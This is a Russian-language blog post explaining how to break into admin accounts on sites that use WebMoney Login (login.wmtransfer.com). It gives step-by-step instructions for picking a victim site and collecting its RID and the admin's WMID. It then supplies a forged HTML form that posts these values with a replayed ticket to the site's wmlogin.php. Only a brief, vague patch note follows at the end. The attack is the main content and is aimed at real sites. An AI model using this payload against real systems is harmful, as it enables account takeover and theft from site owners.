Дыра в авторизации через Login.wmtransfer.com

Сегодня по многочисленным просьбам решил протестировать авторизацию через WMLogin.Немного помучавшись,обнаружил,что дыра всё таки есть.Постараюсь описать,как ей воспользоваться..Сегодня по многочисленным просьбам решил протестировать авторизацию через WMLogin.Немного помучавшись,обнаружил,что дыра всё таки есть.Постараюсь описать,как ей воспользоваться.
Итак.Выбираем букс жертву с авторизацией через кипер.Будет сложно,но результата мы добьёмся.
Смотрим на ссылку для авторизации.она будет вида https://login.wmtransfer.com/GateKeeper.aspx?RID=6b4aa7cb-2bc7-4f07-83a1-9dab000ff106
Нас интересует всё то,что находится после RID=Это мы выделяем,копируем и куда нибудь под руку кладём.Далее смотрим вмид проекта — чаще всего это вмид админа..Вмид тоже откладываем себе под руку.Затем авторизуемся через кипер и смотрим куда дальше будет переход.Обычно,это страница wmlogin.php.Нам это тоже нужно.
Следующий наш шаг: открываем оперу,идём на любой сайт.Входим в исходный код и этот исходный код ВЕСЬ удаляем.Вставляем следующее:


<form action="http://сайт ру/wmlogin.php" method="post">
<input type="hidden" name="WmLogin_WMID" value="WMID проекта">
<input type="hidden" name="WmLogin_UrlID" value=" то что было после RID=">
<input type="hidden" name="WmLogin_Ticket" value="zcVqI9lsoCxg1IyHWauGPxrfAFBItmPB!rZcEI70lhk2kXRm">
<input type="submit" value="go!"></form>


Затем то,что мы вставили,редактируете под жертву и жмёте \»Применить изменения\».На сайте,исходный код которого мы смотрим,всё исчезнет и будет кнопочка \»GO!\».Жмём на неё.Смотрим на результат.Если в аккаунт мы не попадаем,тогда ничо не поделать(( значит у админа уже стоит защита.Кто хочет проверить — ставьте себе дырявый плагин отсюда,ставьте и пробуйте.

А теперь будем защищаться.Погуглив немного,наткнулся на интересную статью по проверке тикетов.Расписывать тут я не буду,т.к. никто нихера всё равно не поймёт. =)
Устанавливаем:
Открываем файл wmlogin.php из архива wmloginbysfb.zip и в нём в строке $urlid=\»здесь_ваш_RID\»; Втыкаем ваш ID,полученный после добавления сайта в систему login.wmtransfer.com
Ну и ниже находим строку:

<siteHolder>Сюда ваш вмид</siteHolder>

— в неё вгоняем ваш вмид )

Всё =)

Автор публикации

не в сети 14 лет

Alex

Комментарии: 0Публикации: 166Регистрация: 19-02-2011

Понравилась статья? Поделись в соц. сетях:

Похожие новости

Отправить комментарий

wpDiscuz
Авторизация
*
*
Регистрация
*
*
*
Генерация пароля